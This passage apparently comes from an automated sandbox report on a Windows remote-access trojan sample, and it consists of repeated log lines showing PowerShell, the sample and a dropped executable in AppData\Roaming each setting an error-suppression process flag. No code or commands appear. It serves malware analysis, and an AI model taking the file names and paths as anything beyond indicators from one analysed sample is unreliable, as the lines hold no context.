                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
